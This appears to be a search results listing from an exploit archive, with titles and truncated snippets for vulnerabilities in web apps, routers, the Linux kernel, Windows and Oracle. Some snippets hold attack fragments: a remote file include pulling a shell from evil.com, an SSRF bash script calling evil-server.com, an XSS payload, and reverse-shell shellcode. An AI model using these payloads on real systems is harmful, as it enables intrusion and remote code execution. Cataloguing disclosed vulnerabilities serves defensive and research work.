39001 matches found
User Registration & Login and User Management System v3.0 - XSS Vulnerability
Exploit Title: User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting XSS Exploit Author: Ashutosh Singh Umath Vendor Homepage: https://phpgurukul.com Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ Versio...
Linux Kernel 6.2 - Userspace Processes To Enable Mitigation Exploit
Exploit Title: Linux Kernel 6.2 - Userspace Processes To Enable Mitigation Exploit Author: nu11secur1ty CVE ID: CVE-2023-1998 Description Summary The Linux kernel allows userspace processes to enable mitigations by calling prctl with PRSETSPECULATIONCTRL which disables the speculation feature as...
Employee Task Management System v1.0 - SQL Injection Vulnerability (2)
Exploit Title: Employee Task Management System v1.0 - SQL Injection on edit-task.php Exploit Author: Muhammad Navaid Zafar Ansari CVE Assigned: CVE-2023-0902 mitre.org, nvd.nist.org Author: Muhammad Navaid Zafar Ansari Vendor Homepage: https://www.sourcecodester.com Software Link: Employee Task...
Oracle Database Vault Metadata Exposure Vulnerability
Oracle Database versions 12.1.0.2, 12.2.0.1, 18c, and 19c suffer from a vault metadata exposure vulnerability. Title: CVE-2021-2175 – Oracle Database Vault Metadata Exposure Vulnerability Product: Database Manufacturer: Oracle Affected Versions: 12.1.0.2, 12.2.0.1, 18c, 19c Tested Versions: 19c...
Siemens APOGEE PXC / TALON TC Authentication Bypass Exploit
APOLOGEE is a Python script and Metasploit module that enumerates a hidden directory on Siemens APOGEE PXC BACnet Automation Controllers and TALON TC BACnet Automation Controllers. With a 7.5 CVSS, this exploit allows for an attacker to perform an authentication bypass using an alternate path or...
SmartRG Router 2.6.13 Remote Code Execution Exploit
Exploit Title: SmartRG Router - Remote Code Execution Exploit Author: Yerodin Richards Vendor Homepage: https://adtran.com Version: 2.5.15 / 2.6.13 confirmed Tested on: SR506n 2.5.15 & SR510n 2.6.13 CVE : CVE-2022-37661 import requests from subprocess import Popen, PIPE routerhost =...
Ransomware Builder Babuk Insecure Permissions Vulnerability
Ransomware Builder Babuk malware suffers from an insecure permissions vulnerability. Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/5dfa998f62612e10d5d28d26948dd50f.txt Contact: email protected Media: twitter.com/malvuln Threat: Ransomware Builder...
Oracle Database Protection Mechanism Bypass Vulnerability
Due to insecure fallback behavior, a man-in-the-middle attacker can bypass NNE's protection against man-in-the-middle attacks and hijack authenticated connections. In some configurations, a full man-in-the-middle attack is possible. Oracle Database versions 19c, 12.2.0.1, and 12.1.0.2 are affecte...
Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery Vulnerabilit
Exploit for hardware platform in category web applications Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery Author: LiquidWorm Product web page: https://www.inim.biz Link:...
Tuneclone 2.20 - Local SEH Buffer Overflow Exploit
Exploit for windows platform in category local exploits Exploit Title: TuneClone Local Seh Exploit Date: 19.06.2019 Vendor Homepage: http://www.tuneclone.com/ Software Link: http://www.tuneclone.com/tuneclonesetup.exe Exploit Author: Achilles Tested Version: 2.20 Tested on: Windows XP SP3 EN 1.-...
FlashChat <= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability
Exploit for unknown platform in category web applications ======================================================================= FlashChat Here are 3 RFI vulnerabilities in Flashchat i've found: Code: http://site.com/scriptpath/inc/cmses/aedating4CMS.php?dirinc=http://evil.com/shell.txt?...
Apache OFBiz 18.12.12 - Directory Traversal Vulnerability
Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal Google Dork: N/A Exploit Author: Abdualhadi khalifa https://twitter.com/absholily Vendor Homepage: https://ofbiz.apache.org/ Software Link: https://ofbiz.apache.org/download.html Version: below example.createBlogPost...
Online Nurse Hiring System 1.0 - Time-Based SQL Injection Vulnerability
Exploit Title: Online Nurse Hiring System 1.0 - 'bookid' Time-Based SQL Injection Exploit Author: Alperen Yozgat Vendor Homepage: https://phpgurukul.com/online-nurse-hiring-system-using-php-and-mysql Software Link: https://phpgurukul.com/?sdmprocessdownload=1&downloadid=17826 Version: 1.0 Tested...
HaoKeKeJi YiQiNiu Server Side Request Forgery Vulnerability
!/bin/bash Set target URL and payload targeturl="http://example.com/application/pay/controller/Api.php" payload="url=http://evil-server.com/exploit" Send the malicious request response=$curl -s -X POST -d "$payload" "$targeturl" Check if the exploit was successful if echo "$response" | grep -q...
Linux/x64 - memfd_create ELF loader Shellcode (170 bytes)
Shellcode Title: Linux/x64 - memfdcreate ELF loader 170 bytes Shellcode Author: Ivan Nikolsky enty8080 & Tomas Globis tomasglgg Tested on: Linux x8664 Shellcode Description: This shellcode attempts to establish reverse TCP connection, reads ELF length, reads ELF and maps it into the memory, creat...
Lucee 5.4.2.17 - Authenticated Reflected XSS Vulnerability
Exploit Title: Lucee 5.4.2.17 - Authenticated Reflected XSS Exploit Author: Yehia Elghaly Vendor Homepage: https://www.lucee.org/ Software Link: https://download.lucee.org/ Version: http://172.16.110.130:8888/lucee/admin/server.cfm?action=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E POST...
Uvdesk v1.1.3 - File Upload Remote Code Execution (Authenticated) Exploit
Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution RCE Authenticated Exploit Author: Daniel Barros @cupc4k3d - Hakai Offensive Security Vendor Homepage: https://www.uvdesk.com Software Link: https://github.com/uvdesk/community-skeleton Version: 1.1.3 Example: python3 CVE-2023-39147....
Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated) Exploit
Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure Unauthenticated Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office" Exploit Author: Tejas Nitin Pingulkar https://cvewalkthrough.com/ Vendor Homepage: https://smartofficepayroll.com/ Software Link:...
Camaleon CMS v2.7.0 - Server-Side Template Injection Vulnerability
Exploit Title: Camaleon CMS v2.7.0 - Server-Side Template Injection SSTI Exploit Author: PARAG BAGUL CVE: CVE-2023-30145 Description Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template Injection SSTI vulnerability via the formats parameter. Affected Component All versions below...
HammerSpace GDE / GFS 4.6.6-324 Authentication Bypass Exploit
This utility generates the TOTP passcode used to sign in as the support service account user for HammerSpace GFS default installations. Both the OVA and ISO are affected. Versions 4.6.6-324 and below with a default installation are affected. Affected Product: HammerSpace Global Data Environment /...
Aigital Wireless-N Repeater Mini_Router.0.131229 Cross Site Scripting Vulnerability
Exploit Title: Aigital Wireless-N Repeater - Stored Cross-Site Scripting Exploit Author: Matteo Mandolini Vendor Homepage: https://web.archive.org/web/20220625053314/https://www.aigital.com/ Version: MiniRouter.0.131229 XSS Stored POST /boafrm/formHomeWlanSetup HTTP/1.1 Host: 192.168.10.253...
Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution via ssl_cert Upload Vulnerability
ADVISORY INFORMATION Exploit Title: Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution RCE via sslcert Upload Date of found: 21 July 2022 Application: Roxy WI .oastify.com;...
Monitorr 1.7.6 Shell Upload Exploit
Exploit Title: Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution Exploit Author: Achuth V P retrymp3 Vendor Homepage: https://github.com/Monitorr/ Software Link: https://github.com/Monitorr/Monitorr Tested on: Ubuntu Version: v1.7.6 Exploit Description: Monitorr v1.7.6 suffer...
WordPress Photoswipe Masonry Gallery 1.2.14 Cross Site Scripting Vulnerability
Wordfence Threat Intelligence team initiated the responsible disclosure process for a vulnerability we discovered in “Photoswipe Masonry Gallery”, a WordPress plugin that is installed on over 10,000 sites. This flaw makes it possible for an authenticated attacker to inject malicious JavaScript th...
Loan Management System 1.0 - SQL injection Authentication Bypass Vulnerability
Exploit Title: Loan Management System 1.0 - SQLi Authentication Bypass Exploit Author: Merve Oral Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html Software Link:...
DrayTek Products - Pre-authentication Remote Root Code Execution Exploit
package main / CVE-2020-8515: DrayTek pre-auth remote root RCE Mon Mar 30 2020 - 0xsha.io Affected: DrayTek Vigor2960 1.3.1Beta, Vigor3900 1.4.4Beta, and Vigor300B 1.3.3Beta, 1.4.2.1Beta, and 1.4.4Beta You should upgrade as soon as possible to 1.5.1 firmware or later This issue has been fixed in...
phpMyAdmin 4.8 - Cross-Site Request Forgery Vulnerability
Exploit for php platform in category web applications Exploit Title: Cross Site Request Forgery CSRF Exploit Author: Riemann Vendor Homepage: https://www.phpmyadmin.net/ Software Link: https://www.phpmyadmin.net/downloads/ Version: 4.8 Tested on: UBUNTU 16.04 LTS -Installed Docker image - docker...
Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE Exploit
This Metasploit module exploits a vulnerability in Jenkins dynamic routing to bypass the Overall/Read ACL and leverage Groovy metaprogramming to download and execute a malicious JAR file. The ACL bypass gadget is specific to Jenkins versions 2.137 and below and will not work on later versions of...
PHP-Proxy 5.1.0 - Local File Inclusion Vulnerability
Exploit for php platform in category web applications Exploit Title: PHP-Proxy 5.1.0 - Local File Inclusion Exploit Author: Ameer Pornillos Contact: https://ethicalhackers.club Vendor Homepage: https://www.php-proxy.com/ Software Link: https://www.php-proxy.com/download/php-proxy.zip Version: 5.1...
Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058) Exploit
Microsoft Windows versions 8.0 and 8.1 on x64 TrackPopupMenu privilege escalation exploit that leverages the vulnerability documented in MS14-058 Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation MS14-058 CVE-2014-4113 Privilege Escalation from ctypes import from ctypes.wintypes import...
Advanced Guestbook 2.2 Blind SQL Injection Vulnerabilities
Exploit for php platform in category web applications ========================================================== Advanced Guestbook 2.2 Blind SQL Injection Vulnerabilities ========================================================== Exploit Title : Advanced Guestbook 2.2 Blind SQL Injection...
MercuryBoard <= 1.1.1 Working Sql Injection
Exploit for unknown platform in category web applications =========================================== MercuryBoard = 1.1.1 Working Sql Injection =========================================== little late posting this /str0ke Exploit:...
Vinchin Backup And Recovery 7.2 setNetworkCardInfo Command Injection Vulnerability
Vinchin Backup and Recovery versions 7.2 and below suffer from a command injection vulnerability in the setNetworkCardInfo function. CVE ID: CVE-2024-22900 Title: Command Injection Vulnerability in Vinchin Backup and Recovery Versions 7.2 and Earlier Description: A critical security vulnerability...
inTouch 1.0 File Upload - Remote Code Execution Vulnerability
Title: inTouch-1.0 File Upload - RCE Author: nu11secur1ty Vendor: https://codecanyon.net/user/media-city Software: https://codecanyon.net/item/intouch-laravel-support-ticket-management-system/35177425?srank=2 Reference: https://portswigger.net/web-security/file-upload,...
WEBIGniter v28.7.23 File Upload - Remote Code Execution Vulnerability
Title: WEBIGniter v28.7.23 File Upload - Remote Code Execution Author: nu11secur1ty Vendor: https://webigniter.net/ Software: https://webigniter.net/demo Reference: https://portswigger.net/web-security/file-upload Description: The media function suffers from file upload vulnerability. The attacke...
Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)
import ctypes, struct from keystone import Shellcode Author: Senzee Shellcode Title: Windows/x64 - PIC Null-Free Calc.exe Shellcode 169 Bytes Date: 07/26/2023 Platform: Windows x64 Tested on: Windows 11 Home/Windows Server 2022 Standard/Windows Server 2019 Datacenter OS Version respectively:...
LISTSERV 17 - Reflected Cross Site Scripting Vulnerability
Exploit Title: LISTSERV 17 - Reflected Cross Site Scripting XSS Google Dork: inurl:/scripts/wa.exe Exploit Author: Shaunt Der-Grigorian Vendor Homepage: https://www.lsoft.com/ Software Link: https://www.lsoft.com/download/listserv.asp Version: 17 Tested on: Windows Server 2019 CVE : CVE-2022-3919...
Purchase Order Management 1.0 SQL Injection Vulnerability
Title: Purchase Order Management-1.0 - SQLi Author: nu11secur1ty Vendor: https://www.sourcecodester.com/user/257130/activity Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html Reference:...
Best POS Management System 1.0 Cross Site Scripting Vulnerability
Exploit Title: Stored Cross Site Scripting on Best pos Management System Exploit Author: Ahmed Ismail @MrOz1l Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html Software Link: https://www.sourcecodester.com/sites/default/files/download/mayurik/kruxton.zi...
Online Eyewear Shop 1.0 SQL Injection Vulnerability
Exploit Title: Online Eyewear Shop 1.0 - Product detail 'id' SQL Injection Unauthenticated Exploit Author: Muhammad Navaid Zafar Ansari Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html Software Link:...
GoGo CD Ripper V1.4.9 Denial of Service Exploit
Exploit Title: GoGo CD Ripper V1.4.9 Denial of Service Exploit Date: 30.12.2022 Vendor Homepage:https://cd-mp3.org/ Software Link: https://download.cnet.com/Gogo-CD-To-MP3-Ripper/3001-21404-10330843.ht Exploit Author: Achilles Tested Version: v1.4.9 Tested on: Windows 7 x64 1.- Run python code...
WSO2 Management Console (Multiple Products) - Unauthenticated Reflected XSS Exploit
Exploit Title: WSO2 Management Console Multiple Products - Unauthenticated Reflected Cross-Site Scripting XSS Exploit Author: cxosmo Vendor Homepage: https://wso2.com Software Link: API Manager https://wso2.com/api-manager/, Identity Server https://wso2.com/identity-server/, Enterprise Integrator...
cmark-gfm Integer overflow Exploit
cmark-gfm, Github's markdown parsing library, is vulnerable to an out-of-bounds write when parsing markdown tables with a high number of columns due to an overflow of the 16bit columns count. cmark-gfm: Integer overflow in table extension cmark-gfm Github's markdown parsing library is vulnerable ...
Exponent CMS 2.6 - Multiple Vulnerabilities
Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities Exploit Author: heinjame Exploit Author: picaroo Vendor Homepage: https://www.exponentcms.org/ Version: http://127.0.0.1:8082/expcms/text/edit/id/id/src/@footer Title, Text Block Payload = " Database credential are disclosed in response P...
Simple Client Management System 1.0 - (multiple) Stored Cross-Site Scripting Vulnerability
Exploit Title: Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting XSS Exploit Author: Sentinal920 Category: Web application Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html Software Link:...
PRTG Network Monitor Remote Code Execution Exploit
This Metasploit module exploits an authenticated remote code execution vulnerability in PRTG Network Monitor. Notifications can be created by an authenticated user and can execute scripts when triggered. Due to a poorly validated input on the script name, it is possible to chain it with a...
Pharmacy Medical Store and Sale Point 1.0 - (catid) SQL Injection Vulnerability
Exploit for php platform in category web applications Title: Pharmacy Medical Store and Sale Point 1.0 - 'catid' SQL Injection Exploit Author: Moaaz Taha 0xStorm Vendor Homepage: https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html...
Cisco WLC 2504 8.9 - Denial of Service Exploit
Exploit Title: Cisco WLC 2504 8.9 - Denial of Service PoC Exploit Author: SecuNinja Vendor Homepage: cisco.com Software Link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos Version: 8.4 to 8.9 Tested on: not applicable, works independent from OS CV...
Windows Net-NTLMv2 Reflection DCOM/RPC Exploit
This Metasploit module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. Currently the module does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token. This module requires Metasploit:...
Light Blog Remote Multiple Vulnerabilities Exploit
Exploit for unknown platform in category web applications ================================================== Light Blog Remote Multiple Vulnerabilities Exploit ================================================== !/usr/bin/php -q -d shortopentag=on \r\n"; echo "Thanks to rgod for the php code and...